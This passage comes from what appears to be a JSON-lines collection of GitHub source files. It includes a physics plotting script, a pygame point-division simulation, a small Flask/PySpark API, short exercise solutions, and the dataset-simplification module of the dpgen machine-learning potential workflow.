fn.nearest_index(r,r_start)\n\nplt.subplot(2,2,1)\nplt.plot(r[start_ind:],(2*rho*Bpm)[start_ind:],'k-.')\nplt.plot(r[start_ind:],(2*rho*Bpm_)[start_ind:],'r--')\nplt.plot(r[start_ind:],(2*rho*(Bpm+Bpm_))[start_ind:],'b-')\nplt.title('$\\mathcal{B}^{+-}$')\n\nplt.subplot(2,2,2)\nplt.plot(r[start_ind:],(2*rho*Bmm)[start_ind:],'k-.')\nplt.plot(r[start_ind:],(2*rho*Bmm_)[start_ind:],'r--')\nplt.plot(r[start_ind:],(2*rho*(Bmm+Bmm_))[start_ind:],'b-')\nplt.title('$\\mathcal{B}^{--}$')\n\nplt.subplot(2,2,3)\nplt.plot(r[start_ind:],(2*rho*B0m)[start_ind:],'k-.')\nplt.plot(r[start_ind:],(2*rho*B0m_)[start_ind:],'r--')\nplt.plot(r[start_ind:],(2*rho*(B0m+B0m_))[start_ind:],'b-')\nplt.title('$\\mathcal{B}^{0-}$')\n\nplt.subplot(2,2,4)\nplt.plot(r[start_ind:],(2*rho*B00)[start_ind:],'k-.')\nplt.plot(r[start_ind:],(2*rho*B00_)[start_ind:],'r--')\nplt.plot(r[start_ind:],(2*rho*(B00+B00_))[start_ind:],'b-')\nplt.title('$\\mathcal{B}^{00}$')\n\n\n#plt.plot(r[start_ind:],(2*rho*Bpm)[start_ind:],'k-',label = '$\\mathcal{B}^{+-}$')\n##plt.plot(r[start_ind:],(rho*Bmm)[start_ind:],'r-',label = '$\\mathcal{B}^{--}$')\n##plt.plot(r[start_ind:],(2*rho*B0m)[start_ind:],'k-',label = '$\\mathcal{B}^{0-}$')\n#plt.plot(r[start_ind:],(-rho*B00)[start_ind:],'k--',label = '$\\mathcal{B}^{00}$')\n#plt.grid(True)\nplt.legend()\nplt.show()\n\ntstamp('plotting')\n\n\n\n\n\n","repo_name":"srijaniiserprinceton/Global_lorentz_stress","sub_path":"plot_kern_shravan.py","file_name":"plot_kern_shravan.py","file_ext":"py","file_size_in_byte":4914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"20372340312","text":"from random import *\r\nfrom time import *\r\nimport pygame\r\n\r\npygame.init()\r\n\r\n# press LMB to create a growing point\r\n# press Space to pause/start\r\n# press Esc or the window cross to exit\r\n\r\n# parameters\r\nres = wid, hei = 1920, 1080\r\nfps = 70\r\ncol_point = 0\r\nspeed = 6\r\n\r\ngreen = pygame.Color('#008f0e')\r\ngray = pygame.Color('#a8a8a8')\r\n\r\n# creating window\r\nwin = pygame.display.set_mode(res, 0)\r\nclock = pygame.time.Clock()\r\n\r\npoints = []\r\n\r\n\r\nclass Point: # creating class for points\r\n\r\n    def __init__(self, x, y, ax, ay, color, pulse):\r\n        self.x = x\r\n        self.y = y\r\n        self.ax = ax\r\n        self.ay = ay\r\n        self.color = color\r\n        self.pulse = pulse\r\n\r\n        self.radius = 5\r\n        self.stage = 5\r\n        self.timer = 0\r\n        self.growth = 5/self.stage\r\n\r\n    def update(self):\r\n        if self.pulse != 0:\r\n            # moving\r\n            self.x += self.ax\r\n            self.y += self.ay\r\n\r\n            # reflection from the wall\r\n            if self.x <= 0 or self.x >= wid:\r\n                self.ax = -self.ax\r\n            if self.y <= 0 or self.y >= hei:\r\n                self.ay = -self.ay\r\n\r\n            self.pulse -= 1\r\n        else:\r\n            self.ax, self.ay = 0, 0\r\n\r\n        self.timer += 1\r\n\r\n        if self.timer - fps > 0: # checking time\r\n            if self.stage != 0: # check whether to keep growing or divide\r\n                self.radius += self.growth\r\n                self.stage -= 1\r\n                self.timer = 0\r\n            else:\r\n                self.division()\r\n\r\n        pygame.draw.circle(win, self.color, (self.x, self.y), self.radius)\r\n\r\n    def division(self):\r\n        sx, sy = randint(-speed, speed), randint(-speed, speed)\r\n        p = randint(1, 20)\r\n        \r\n        points.append(Point(self.x, self.y, sx, sy, green, p))\r\n        points.append(Point(self.x, self.y, -sx, -sy, green, p))\r\n\r\n        points.remove(self)\r\n\r\n\r\n# creating points on window\r\nfor i in range(col_point):\r\n    points.append(\r\n        Point(randint(10, wid - 10), randint(10, hei - 10), 0, 0, green, 0))\r\n\r\n# initialize the text font\r\npygame.font.init()\r\nfont1 
= pygame.font.Font(None, 30)\r\n\r\n# main loop\r\ngo = True\r\nwhile True:\r\n    xt, yt = pygame.mouse.get_pos() # get the cursor coordinates\r\n    for i in pygame.event.get():\r\n        if i.type == pygame.QUIT:\r\n            exit()\r\n        if i.type == pygame.KEYDOWN:\r\n            if i.key == pygame.K_ESCAPE:\r\n                exit()\r\n            if i.key == pygame.K_SPACE:\r\n                go = not go\r\n        if i.type == pygame.MOUSEBUTTONDOWN:\r\n            if i.button == 1: # LMB\r\n                points.append(Point(xt, yt, 0, 0, green, 0))\r\n\r\n    if go: # updating points\r\n        win.fill(gray)\r\n        [p.update() for p in points]\r\n\r\n    # render the counter text\r\n    colm = font1.render('Number of points: ' + str(len(points)), 1, (0, 0, 0))\r\n    win.blit(colm, (3, 3))\r\n\r\n    # updating window\r\n    pygame.display.flip()\r\n    pygame.display.set_caption(f'FPS: {round(clock.get_fps())}')\r\n    clock.tick(fps)","repo_name":"Stepainpy/Points","sub_path":"point v5.py","file_name":"point v5.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"20060165896","text":"\"\"\"\r\n    flask-api.py\r\n    Flask based API to compute results using PySpark\r\n\"\"\"\r\nfrom flask import Flask\r\nfrom flask import request\r\nfrom flask import Response\r\nfrom flask_json import FlaskJSON, JsonError, json_response\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql.functions import *\r\nfrom pyspark.sql.types import *\r\nimport pandas as pd\r\nimport re\r\nimport sys\r\nimport ingestion.feed_collector\r\nfrom waitress import serve\r\n\r\napp = Flask(__name__)\r\njson = FlaskJSON(app)\r\n\r\n\r\n@json.encoder\r\ndef custom_encoder(o):\r\n    pass\r\n\r\n\r\n@app.errorhandler(500)\r\ndef system_error(e):\r\n    return json_response(status_=500, status=500, description=\"System error. 
Please contact the administrator.\")\r\n\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n    return app.send_static_file('index.html')\r\n\r\n\r\n@app.route(\"/adidas/api/get_total_pages\", methods=['POST'])\r\ndef get_total_pages():\r\n    data = request.get_json(force=True)\r\n    keys = data.keys()\r\n    output = []\r\n    author = \"\"\r\n    results = []\r\n    if 'author' in keys:\r\n        author = data['author']\r\n        print(\"author\", author)\r\n        books_data_path = \"/adidas/data/cleaned/books/*.parquet\"\r\n        authors_data_path = \"/adidas/data/cleaned/authors/*.parquet\"\r\n        author_key = spark.read.parquet(authors_data_path).filter(col(\"name\") == author).select(\"author_key\").first()[0]\r\n        output = spark.read.parquet(books_data_path).filter(col(\"author\") == author_key)\\\r\n            .agg(sum(\"number_of_pages\").alias(\"total_pages_count\"))\r\n        print(output)\r\n\r\n    results = output.toPandas().to_json(orient=\"records\")\r\n\r\n    return Response(results, mimetype='application/json')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    spark = SparkSession.builder.appName(\"adidas-case-study-api\").getOrCreate()\r\n    serve(app, host=\"localhost\", port=\"5999\")\r\n","repo_name":"coderepairer/case-study","sub_path":"flask-api.py","file_name":"flask-api.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"11570081956","text":"import re\nimport sys\nimport collections\ntext = sys.stdin.read()\ntext = text[:text.find('#')]\ntext = text.lower()\nwords = re.findall(r'\\w+', text)\nwords = [word if len(word) <= 15 else word[:15] for word in words]\ncount = collections.Counter(words)\nres = sorted(count.items(), key=lambda x: (-x[1], x[0]))\nprint(len(res))\nfor i in range(int(0.1*len(res))):\n    print(f'{res[i][1]}:{res[i][0]}')","repo_name":"xxxhol1c/PTA-python","sub_path":"programming/7-1.py","file_name":"7-1.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"423698425","text":"# Programmers LV 2: Target Number\ndef solution(numbers, target):\n    length = len(numbers)\n    answer = 0\n    \n    # each stack entry is (index consumed so far, running total); seed with +/- the first number\n    stack = [(0, numbers[0]), (0, -(numbers[0]))]\n    while stack:\n        idx, total = stack.pop()\n        \n        if idx == length-1: # if we have walked the whole array\n            if total == target: # and this sign combination sums to the target\n                answer += 1\n        else:\n            stack.append((idx+1, total+numbers[idx+1]))\n            stack.append((idx+1, total-numbers[idx+1]))\n    \n    return answer\n\n\n\nprint(solution([1, 1, 1, 1, 1], 3))","repo_name":"kimhyeongjun95/AlgoPullgo","sub_path":"014주차/타겟 넘버/hyeongjun.py","file_name":"hyeongjun.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"}
+{"seq_id":"8653435913","text":"import re\n\ntext = open('regex_sum_1241700.txt','r')\nlines = text.readlines()\nsum = 0\nfor l in lines:\n\tdigits = re.findall('[0-9]+',l)\n\tif(len(digits)!=0):\n\t\tfor i in digits:\n\t\t\tsum += int(i)\nprint(sum)\n","repo_name":"mkhorosh/dataCourse","sub_path":"1/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"70538726633","text":"\"\"\"Simplify dataset (minimize the dataset size).\n\nInit:\npick up init data from dataset randomly\n\nIter:\n00: train models (same as generator)\n01: calculate model deviations of the rest dataset, pick up data with proper model 
deviation\n02: fp (optional, if the original dataset does not have fp data, same as generator)\n\"\"\"\nimport logging\nimport queue\nimport os\nimport json\nimport argparse\nimport pickle\nimport glob\nimport fnmatch\nimport warnings\nimport dpdata\nimport numpy as np\n\nfrom dpgen import dlog\nfrom dpgen import SHORT_CMD\nfrom dpgen.util import sepline\nfrom dpgen.remote.decide_machine import decide_train_machine\nfrom dpgen.dispatcher.Dispatcher import Dispatcher, make_dispatcher\nfrom dpgen.generator.run import make_train, run_train, post_train, run_fp, post_fp, fp_name, model_devi_name, train_name, train_task_fmt, sys_link_fp_vasp_pp, make_fp_vasp_incar, make_fp_vasp_kp, make_fp_vasp_cp_cvasp, data_system_fmt, model_devi_task_fmt, fp_task_fmt\n# TODO: maybe the following functions can be moved to dpgen.util\nfrom dpgen.generator.lib.utils import log_iter, make_iter_name, create_path, record_iter\nfrom dpgen.remote.decide_machine import decide_train_machine, decide_fp_machine, decide_model_devi_machine\nfrom dpgen.generator.lib.gaussian import make_gaussian_input\n\n\npicked_data_name = \"data.picked\"\nrest_data_name = \"data.rest\"\naccurate_data_name = \"data.accurate\"\ndetail_file_name_prefix = \"details\"\nsys_name_fmt = 'sys.' + data_system_fmt\nsys_name_pattern = 'sys.[0-9]*[0-9]'\n\ndef expand_sys_str(root_dir):\n    matches = []\n    for root, dirnames, filenames in os.walk(root_dir, followlinks=True):\n        for filename in fnmatch.filter(filenames, 'type.raw'):\n            matches.append(root)\n    matches.sort()\n    dirnames = [os.path.basename(ii) for ii in matches]\n    if (len(list(set(dirnames))) != len(matches)) :\n        raise RuntimeError('duplicated system name: it is highly recommended to place all systems at the same directory level and give them different names')\n    return matches\n\n\ndef get_system_cls(jdata):\n    if jdata.get(\"labeled\", False):\n        return dpdata.LabeledSystem\n    return dpdata.System\n\n\ndef get_multi_system(path, jdata):\n    system = get_system_cls(jdata)\n    systems = dpdata.MultiSystems(\n        *[system(os.path.join(path, s), fmt='deepmd/npy') for s in os.listdir(path)])\n    return systems\n\n\ndef get_systems(path, jdata):\n    system_cls = get_system_cls(jdata)\n    system_paths = expand_sys_str(path) \n    systems = {}\n    for ii in system_paths:\n        systems[os.path.basename(ii)] = system_cls(ii, fmt='deepmd/npy')\n    return systems\n\n\ndef get_system_idx(path):\n    system_paths = expand_sys_str(path) \n    sys_idx_map = {}\n    for idx,ii in enumerate(system_paths):\n        sys_idx_map[os.path.basename(ii)] = idx\n    return sys_idx_map\n\n\ndef init_model(iter_index, jdata, mdata):\n    training_init_model = jdata.get('training_init_model', False)\n    if not training_init_model:\n        return\n    iter0_models = []\n    training_iter0_model = jdata.get('training_iter0_model_path', [])\n    if type(training_iter0_model) == str:\n        training_iter0_model = [training_iter0_model]\n    for ii in training_iter0_model: \n        model_is = glob.glob(ii)\n        model_is.sort()\n        iter0_models += [os.path.abspath(ii) for ii in model_is]\n    numb_models = jdata['numb_models']\n    assert(numb_models == len(iter0_models)), \"training_iter0_model_path should be provided, and the number of models should be equal to %d\" % numb_models\n    work_path = os.path.join(make_iter_name(iter_index), train_name)\n    create_path(work_path)\n    cwd = os.getcwd()\n    for ii in range(len(iter0_models)):\n        train_path = os.path.join(work_path, train_task_fmt % ii)\n        create_path(train_path)\n        os.chdir(train_path)\n        ckpt_files = glob.glob(os.path.join(iter0_models[ii], 'model.ckpt*'))\n        for jj in ckpt_files:\n            
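# (editorial note) each iter-0 model directory is expected to hold checkpoint\n            # files; they are symlinked here so training can restart from those weights\n            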
os.symlink(jj, os.path.basename(jj))\n os.chdir(cwd)\n\n\ndef init_pick(iter_index, jdata, mdata):\n \"\"\"pick up init data from dataset randomly\"\"\"\n pick_data = jdata['pick_data']\n init_pick_number = jdata['init_pick_number']\n use_clusters = jdata.get('use_clusters', False)\n # use MultiSystems with System\n # TODO: support System and LabeledSystem\n # TODO: support other format\n if use_clusters:\n systems = get_multi_system(pick_data, jdata)\n else:\n systems = get_systems(pick_data, jdata)\n # label the system\n labels = []\n if use_clusters:\n items = systems.systems.items()\n else:\n items = systems.items()\n for key, system in items:\n labels.extend([(key, j) for j in range(len(system))])\n\n # random pick\n iter_name = make_iter_name(iter_index)\n work_path = os.path.join(iter_name, model_devi_name)\n create_path(work_path)\n idx = np.arange(len(labels))\n np.random.shuffle(idx)\n pick_idx = idx[:init_pick_number]\n rest_idx = idx[init_pick_number:]\n\n # dump the init data\n sys_data_path = os.path.join(work_path, picked_data_name)\n _init_dump_selected_frames(systems, labels, pick_idx, sys_data_path, jdata)\n\n # dump the rest data\n sys_data_path = os.path.join(work_path, rest_data_name)\n _init_dump_selected_frames(systems, labels, rest_idx, sys_data_path, jdata)\n\n\ndef _add_system(systems, key, system):\n if key in systems.keys():\n systems[key].append(system)\n else:\n systems[key] = system\n return systems\n\n\ndef _init_dump_selected_frames(systems, labels, selc_idx, sys_data_path, jdata):\n pick_data = jdata['pick_data']\n use_clusters = jdata.get('use_clusters', False)\n if use_clusters:\n selc_systems = dpdata.MultiSystems()\n for j in selc_idx:\n sys_name, sys_id = labels[j]\n selc_systems.append(systems[sys_name][sys_id])\n selc_systems.to_deepmd_raw(sys_data_path)\n selc_systems.to_deepmd_npy(sys_data_path, set_size=selc_idx.size)\n else:\n selc_systems = {}\n for j in selc_idx:\n sys_name, sys_id = labels[j]\n selc_systems = _add_system(selc_systems, sys_name, systems[sys_name][sys_id])\n sys_idx_map = get_system_idx(pick_data)\n for kk in selc_systems.keys():\n sub_path = os.path.join(sys_data_path, sys_name_fmt % sys_idx_map[kk])\n selc_systems[kk].to_deepmd_raw(sub_path)\n selc_systems[kk].to_deepmd_npy(sub_path, set_size=selc_idx.size)\n with open(os.path.join(sys_data_path, 'sys_idx_map.json'), 'w') as fp:\n json.dump(sys_idx_map, fp, indent=4)\n\ndef _dump_system_dict(systems, path):\n for kk in systems:\n sub_path = os.path.join(path, sys_name_fmt % (int(kk)))\n systems[kk].to_deepmd_raw(sub_path)\n systems[kk].to_deepmd_npy(sub_path, set_size=systems[kk].get_nframes())\n\n\ndef make_model_devi(iter_index, jdata, mdata):\n \"\"\"calculate the model deviation of the rest idx\"\"\"\n pick_data = jdata['pick_data']\n use_clusters = jdata.get('use_clusters', False)\n iter_name = make_iter_name(iter_index)\n work_path = os.path.join(iter_name, model_devi_name)\n create_path(work_path)\n # link the model\n train_path = os.path.join(iter_name, train_name)\n train_path = os.path.abspath(train_path)\n models = glob.glob(os.path.join(train_path, \"graph*pb\"))\n for mm in models:\n model_name = os.path.basename(mm)\n os.symlink(mm, os.path.join(work_path, model_name))\n # link the last rest data\n last_iter_name = make_iter_name(iter_index-1)\n rest_data_path = os.path.join(last_iter_name, model_devi_name, rest_data_name)\n if not os.path.exists(rest_data_path):\n return False\n if use_clusters:\n for jj, subsystem in enumerate(os.listdir(rest_data_path)):\n 
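# one model-deviation task per cluster subsystem carried over from the last iteration\n            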
task_name = \"task.\" + model_devi_task_fmt % (0, jj)\n task_path = os.path.join(work_path, task_name)\n create_path(task_path)\n os.symlink(os.path.abspath(os.path.join(rest_data_path, subsystem)),\n os.path.abspath(os.path.join(task_path, rest_data_name)))\n else:\n rest_data_path = os.path.abspath(rest_data_path)\n sys_path = glob.glob(os.path.join(rest_data_path, sys_name_pattern))\n cwd = os.getcwd()\n for ii in sys_path:\n task_name = \"task.\" + model_devi_task_fmt % (int(os.path.basename(ii).split('.')[1]), 0)\n task_path = os.path.join(work_path, task_name)\n create_path(task_path) \n os.chdir(task_path)\n os.symlink(os.path.relpath(ii), rest_data_name)\n os.chdir(cwd)\n os.chdir(cwd)\n return True\n\n\ndef run_model_devi(iter_index, jdata, mdata):\n \"\"\"submit dp test tasks\"\"\"\n iter_name = make_iter_name(iter_index)\n work_path = os.path.join(iter_name, model_devi_name)\n # generate command\n commands = []\n tasks = glob.glob(os.path.join(work_path, \"task.*\"))\n run_tasks = [os.path.basename(ii) for ii in tasks]\n # get models\n models = glob.glob(os.path.join(work_path, \"graph*pb\"))\n model_names = [os.path.basename(ii) for ii in models]\n task_model_list = []\n for ii in model_names:\n task_model_list.append(os.path.join('..', ii))\n # get max data size\n data_size = max([len(dpdata.System(os.path.join(\n task, rest_data_name), fmt=\"deepmd/npy\")) for task in tasks])\n # models\n commands = []\n detail_file_names = []\n for ii, mm in enumerate(task_model_list):\n detail_file_name = \"{prefix}.{ii}\".format(\n prefix=detail_file_name_prefix,\n ii=ii,\n )\n # TODO: support 0.x?\n command = \"{python} -m deepmd test -m {model} -s {system} -n {numb_test} -d {detail_file}\".format(\n python=mdata['python_test_path'],\n model=mm,\n system=rest_data_name,\n numb_test=data_size,\n detail_file=detail_file_name,\n )\n commands.append(command)\n detail_file_names.append(detail_file_name)\n # submit\n try:\n model_devi_group_size = mdata['model_devi_group_size']\n except:\n model_devi_group_size = 1\n\n forward_files = [rest_data_name]\n backward_files = sum([[pf+\".e.out\", pf+\".f.out\", pf+\".v.out\"] for pf in detail_file_names], [])\n\n dispatcher = make_dispatcher(mdata['model_devi_machine'], mdata['model_devi_resources'], work_path, run_tasks, model_devi_group_size)\n dispatcher.run_jobs(mdata['model_devi_resources'],\n commands,\n work_path,\n run_tasks,\n model_devi_group_size,\n model_names,\n forward_files,\n backward_files,\n outlog='model_devi.log',\n errlog='model_devi.log')\n\n\ndef post_model_devi(iter_index, jdata, mdata):\n \"\"\"calculate the model deviation\"\"\"\n use_clusters = jdata.get('use_clusters', False)\n iter_name = make_iter_name(iter_index)\n work_path = os.path.join(iter_name, model_devi_name)\n tasks = glob.glob(os.path.join(work_path, \"task.*\"))\n tasks.sort()\n\n e_trust_lo = jdata['e_trust_lo']\n e_trust_hi = jdata['e_trust_hi']\n f_trust_lo = jdata['f_trust_lo']\n f_trust_hi = jdata['f_trust_hi']\n\n if use_clusters:\n sys_accurate = dpdata.MultiSystems()\n sys_candinate = dpdata.MultiSystems()\n sys_failed = dpdata.MultiSystems()\n else:\n sys_accurate = {}\n sys_candinate = {}\n sys_failed = {}\n all_names = set()\n\n for task in tasks:\n if not use_clusters:\n sys_name = os.path.basename(task).split('.')[1]\n all_names.add(sys_name)\n # e.out\n details_e = glob.glob(os.path.join(task, \"{}.*.e.out\".format(detail_file_name_prefix)))\n e_all = np.array([np.loadtxt(detail_e, ndmin=2)[:, 1] for detail_e in details_e])\n e_std = 
np.std(e_all, axis=0)\n n_frame = e_std.size\n \n # f.out\n details_f = glob.glob(os.path.join(task, \"{}.*.f.out\".format(detail_file_name_prefix)))\n f_all = np.array([np.loadtxt(detail_f, ndmin=2)[:, 3:6].reshape((n_frame, -1, 3)) for detail_f in details_f])\n # (n_model, n_frame, n_atom, 3)\n f_std = np.std(f_all, axis=0)\n # (n_frame, n_atom, 3)\n f_std = np.linalg.norm(f_std, axis=2)\n # (n_frame, n_atom)\n f_std = np.max(f_std, axis=1)\n # (n_frame,)\n\n system_cls = get_system_cls(jdata)\n for subsys, e_devi, f_devi in zip(system_cls(os.path.join(task, rest_data_name), fmt='deepmd/npy'), e_std, f_std):\n if (e_devi < e_trust_hi and e_devi >= e_trust_lo) or (f_devi < f_trust_hi and f_devi >= f_trust_lo) :\n if use_clusters:\n sys_candinate.append(subsys)\n else:\n sys_candinate = _add_system(sys_candinate, sys_name, subsys)\n elif (e_devi >= e_trust_hi ) or (f_devi >= f_trust_hi ):\n if use_clusters:\n sys_failed.append(subsys)\n else:\n sys_failed = _add_system(sys_failed, sys_name, subsys)\n elif (e_devi < e_trust_lo and f_devi < f_trust_lo ):\n if use_clusters:\n sys_accurate.append(subsys)\n else:\n sys_accurate = _add_system(sys_accurate, sys_name, subsys)\n else:\n raise RuntimeError('reach a place that should NOT be reached...')\n if use_clusters:\n counter = {\"candidate\": sys_candinate.get_nframes(), \"accurate\": sys_accurate.get_nframes(), \"failed\": sys_failed.get_nframes()}\n fp_sum = sum(counter.values())\n for cc_key, cc_value in counter.items():\n dlog.info(\"{0:9s} : {1:6d} in {2:6d} {3:6.2f} %\".format(cc_key, cc_value, fp_sum, cc_value/fp_sum*100))\n else:\n all_names = list(all_names)\n all_names.sort()\n counter = {\"candidate\": 0, \"accurate\": 0, \"failed\": 0}\n for kk in all_names:\n sys_counter = {\"candidate\": 0, \"accurate\": 0, \"failed\": 0}\n if kk in sys_candinate.keys():\n sys_counter['candidate'] += sys_candinate[kk].get_nframes()\n if kk in sys_accurate.keys():\n sys_counter['accurate'] += sys_accurate[kk].get_nframes()\n if kk in sys_failed.keys():\n sys_counter['failed'] += sys_failed[kk].get_nframes()\n fp_sum = sum(sys_counter.values())\n for cc_key, cc_value in sys_counter.items():\n if fp_sum != 0:\n dlog.info(\"sys{0:s} {1:9s} : {2:6d} in {3:6d} {4:6.2f} %\".format(kk, cc_key, cc_value, fp_sum, cc_value/fp_sum*100))\n else:\n dlog.info(\"sys{0:s} {1:9s} : {2:6d} in {3:6d} {4:6.2f} %\".format(kk, cc_key, cc_value, fp_sum, 0*100))\n for ii in ['candidate', 'accurate', 'failed']:\n counter[ii] += sys_counter[ii]\n \n if counter['candidate'] == 0 and counter['failed'] > 0:\n raise RuntimeError('no candidate but still have failed cases, stop. 
You may want to refine the training or to increase the trust level hi')\n\n # label the candidate system\n labels = []\n if use_clusters:\n items = sys_candinate.systems.items()\n else:\n items = sys_candinate.items()\n for key, system in items:\n labels.extend([(key, j) for j in range(len(system))])\n # candinate: pick up randomly\n iter_pick_number = jdata['iter_pick_number']\n idx = np.arange(counter['candidate'])\n assert(len(idx) == len(labels))\n np.random.shuffle(idx)\n pick_idx = idx[:iter_pick_number]\n rest_idx = idx[iter_pick_number:]\n dlog.info(\"total candidate {0:6d} picked {1:6d} ({2:6.2f} %) rest {3:6d} ({4:6.2f} % )\".format\\\n (counter['candidate'], len(pick_idx), float(len(pick_idx))/counter['candidate']*100., len(rest_idx), float(len(rest_idx))/counter['candidate']*100.))\n\n # dump the picked candinate data\n if use_clusters:\n picked_systems = dpdata.MultiSystems()\n for j in pick_idx:\n sys_name, sys_id = labels[j]\n picked_systems.append(sys_candinate[sys_name][sys_id])\n sys_data_path = os.path.join(work_path, picked_data_name)\n picked_systems.to_deepmd_raw(sys_data_path)\n picked_systems.to_deepmd_npy(sys_data_path, set_size=iter_pick_number)\n else:\n selc_systems = {}\n for j in pick_idx:\n sys_name, sys_id = labels[j]\n selc_systems = _add_system(selc_systems, sys_name, sys_candinate[sys_name][sys_id])\n sys_data_path = os.path.join(work_path, picked_data_name)\n _dump_system_dict(selc_systems, sys_data_path)\n\n # dump the rest data (not picked candinate data and failed data)\n if use_clusters:\n rest_systems = dpdata.MultiSystems()\n for j in rest_idx:\n sys_name, sys_id = labels[j]\n rest_systems.append(sys_candinate[sys_name][sys_id])\n rest_systems += sys_failed\n sys_data_path = os.path.join(work_path, rest_data_name)\n rest_systems.to_deepmd_raw(sys_data_path)\n rest_systems.to_deepmd_npy(sys_data_path, set_size=rest_idx.size)\n else:\n selc_systems = {}\n for j in rest_idx:\n sys_name, sys_id = labels[j]\n selc_systems = _add_system(selc_systems, sys_name, sys_candinate[sys_name][sys_id])\n for kk in sys_failed.keys():\n selc_systems = _add_system(selc_systems, kk, sys_failed[kk]) \n sys_data_path = os.path.join(work_path, rest_data_name)\n _dump_system_dict(selc_systems, sys_data_path)\n\n # dump the accurate data -- to another directory\n if use_clusters:\n sys_data_path = os.path.join(work_path, accurate_data_name)\n sys_accurate.to_deepmd_raw(sys_data_path)\n sys_accurate.to_deepmd_npy(sys_data_path, set_size=sys_accurate.get_nframes())\n else:\n sys_data_path = os.path.join(work_path, accurate_data_name)\n _dump_system_dict(sys_accurate, sys_data_path)\n\n\ndef make_fp_labeled(iter_index, jdata): \n dlog.info(\"already labeled, skip make_fp and link data directly\")\n pick_data = jdata['pick_data']\n use_clusters = jdata.get('use_clusters', False)\n iter_name = make_iter_name(iter_index)\n work_path = os.path.join(iter_name, fp_name)\n create_path(work_path)\n picked_data_path = os.path.join(iter_name, model_devi_name, picked_data_name)\n if use_clusters:\n os.symlink(os.path.abspath(picked_data_path), os.path.abspath(\n os.path.join(work_path, \"task.\" + data_system_fmt % 0)))\n os.symlink(os.path.abspath(picked_data_path), os.path.abspath(\n os.path.join(work_path, \"data.\" + data_system_fmt % 0)))\n else:\n picked_data_path = os.path.abspath(picked_data_path)\n sys_path = glob.glob(os.path.join(picked_data_path, sys_name_pattern))\n cwd = os.getcwd()\n os.chdir(work_path)\n for ii in sys_path:\n sys_idx = 
os.path.basename(ii).split('.')[1]\n data_dir = 'data.' + data_system_fmt % int(sys_idx)\n task_dir = 'task.' + data_system_fmt % int(sys_idx)\n os.symlink(os.path.relpath(ii), data_dir)\n os.symlink(os.path.relpath(ii), task_dir)\n os.chdir(cwd)\n\n\ndef make_fp_configs(iter_index, jdata):\n pick_data = jdata['pick_data']\n use_clusters = jdata.get('use_clusters', False)\n iter_name = make_iter_name(iter_index)\n work_path = os.path.join(iter_name, fp_name)\n create_path(work_path)\n picked_data_path = os.path.join(iter_name, model_devi_name, picked_data_name)\n if use_clusters:\n systems = get_multi_system(picked_data_path, jdata)\n jj = 0\n for system in systems:\n for subsys in system:\n task_name = \"task.\" + fp_task_fmt % (0, jj)\n task_path = os.path.join(work_path, task_name)\n create_path(task_path)\n subsys.to('vasp/poscar', os.path.join(task_path, 'POSCAR'))\n jj += 1\n else:\n picked_data_path = os.path.abspath(picked_data_path)\n sys_path = glob.glob(os.path.join(picked_data_path, sys_name_pattern))\n for ii in sys_path:\n tmp_sys = dpdata.System(ii, fmt = 'deepmd/npy')\n sys_idx = os.path.basename(ii).split('.')[1]\n jj = 0\n for ss in tmp_sys:\n task_name = \"task.\" + fp_task_fmt % (int(sys_idx), jj)\n task_path = os.path.join(work_path, task_name)\n create_path(task_path)\n ss.to('vasp/poscar', os.path.join(task_path, 'POSCAR'))\n job = {}\n with open(os.path.join(task_path, 'job.json'), 'w') as fp:\n json.dump(job, fp, indent=4)\n jj += 1\n\n\ndef make_fp_gaussian(iter_index, jdata):\n work_path = os.path.join(make_iter_name(iter_index), fp_name)\n fp_tasks = glob.glob(os.path.join(work_path, 'task.*'))\n cwd = os.getcwd()\n if 'user_fp_params' in jdata.keys() :\n fp_params = jdata['user_fp_params']\n else:\n fp_params = jdata['fp_params']\n cwd = os.getcwd()\n for ii in fp_tasks:\n os.chdir(ii)\n sys_data = dpdata.System('POSCAR').data\n ret = make_gaussian_input(sys_data, fp_params)\n with open('input', 'w') as fp:\n fp.write(ret)\n os.chdir(cwd)\n\n\ndef make_fp_vasp(iter_index, jdata):\n # abs path for fp_incar if it exists\n if 'fp_incar' in jdata:\n jdata['fp_incar'] = os.path.abspath(jdata['fp_incar'])\n # get nbands esti if it exists\n if 'fp_nbands_esti_data' in jdata:\n nbe = NBandsEsti(jdata['fp_nbands_esti_data'])\n else:\n nbe = None\n # order is critical!\n # 1, create potcar\n sys_link_fp_vasp_pp(iter_index, jdata)\n # 2, create incar\n make_fp_vasp_incar(iter_index, jdata, nbands_esti = nbe)\n # 3, create kpoints\n make_fp_vasp_kp(iter_index, jdata)\n # 4, copy cvasp\n make_fp_vasp_cp_cvasp(iter_index,jdata)\n\n\ndef make_fp_calculation(iter_index, jdata):\n fp_style = jdata['fp_style']\n if fp_style == 'vasp':\n make_fp_vasp(iter_index, jdata)\n elif fp_style == 'gaussian':\n make_fp_gaussian(iter_index, jdata)\n else :\n raise RuntimeError('unsupported fp_style ' + fp_style)\n\n\ndef make_fp(iter_index, jdata, mdata):\n labeled = jdata.get(\"labeled\", False)\n if labeled:\n make_fp_labeled(iter_index, jdata)\n else:\n make_fp_configs(iter_index, jdata)\n make_fp_calculation(iter_index, jdata)\n\n\ndef run_iter(param_file, machine_file):\n \"\"\" init (iter 0): init_pick\n\n tasks (iter > 0):\n 00 make_train (same as generator)\n 01 run_train (same as generator)\n 02 post_train (same as generator)\n 03 make_model_devi\n 04 run_model_devi\n 05 post_model_devi\n 06 make_fp\n 07 run_fp (same as generator)\n 08 post_fp (same as generator)\n \"\"\"\n # TODO: function of handling input json should be combined as one function\n try:\n import ruamel\n from 
